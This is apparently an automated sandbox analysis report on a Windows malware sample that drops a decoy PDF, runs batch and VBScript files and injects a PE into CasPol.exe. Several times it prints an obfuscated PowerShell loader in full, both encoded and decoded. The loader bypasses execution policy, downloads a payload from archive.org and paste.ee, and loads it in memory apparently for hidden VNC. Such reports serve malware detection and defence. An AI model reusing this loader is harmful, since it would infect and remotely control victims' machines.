Source: wscript.exe, 0000000F.00000003.1526482299.0000023FDA41F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1526755865.0000023FDC6C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1526614342.0000023FDC4BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1522043070.0000023FDC4BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1523124446.0000023FDC4BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1526835553.0000023FDC5C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1523425436.0000023FDC4BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1522805277.0000023FDC4BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1526250566.0000023FDA416000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000003.1549681901.0000022A5F22A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000003.1553064460.0000022A5D154000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eLGupbRUclWULoZxoplnxiOHIhImWlGLUGkuOmcULuLGALcWjuKfOKGKcckqiWdkabnj = "iBWLquWiWlbWgKOfecWOdloLZzNWpcOlhbkijLiJLqkAikGsmiRicrhgfsuAWGGiPzqG"
Source: wscript.exe, 0000000F.00000003.1525851518.0000023FDC63E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fillikWpnQOApLNxnUKfpKKbUPurLioLvWdcWcWLAoKupasKiGPWLKAGIWNnuGtLgBLLsmiRicrhgfs
Source: wscript.exe, 0000001B.00000002.1576285507.000002159CF19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.1575117971.000002159CF19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.1573411569.000002159CF0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GkdnicxWfBLNbbGWnWuktoGcfLTmGbbuZWlicCukbZkUhLpagNcZcnzLWiHfLPJtizbLsmiRicrhgfsj
Source: wscript.exe, 0000000F.00000003.1522731210.0000023FDC2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000003.1548577126.0000022A5F046000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.1570598889.000002159CBA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DiBWLquWiWlbWgKOfecWOdloLZzNWpcOlhbkijLiJLqkAikGsmiRicrhgfsuAWGGiPzqGuNWGZP
Source: wscript.exe, 0000000F.00000003.1525851518.0000023FDC63E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iBWLquWiWlbWgKOfecWOdloLZzNWpcOlhbkijLiJLqkAikGsmiRicrhgfsuAWGGiPzqGLLCWWeGfaae
Source: TM3utH2CsU.exe, 00000000.00000003.1717148348.00000206945E2000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000003.1716808753.00000206945DC000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000003.1407187350.00000206945DC000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000003.1380346507.00000206945DF000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000003.1436659897.00000206945E0000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000003.1466683610.00000206945E0000.00000004.00000020.00020000.00000000.sdmp, TM3utH2CsU.exe, 00000000.00000003.1380283956.00000206945DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2410995855.000001AF310FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: DC1008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 11A7008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 92A008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 107A008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 40C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1099008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\privacy_policy.pdf Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\privacy_policy.pdf" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
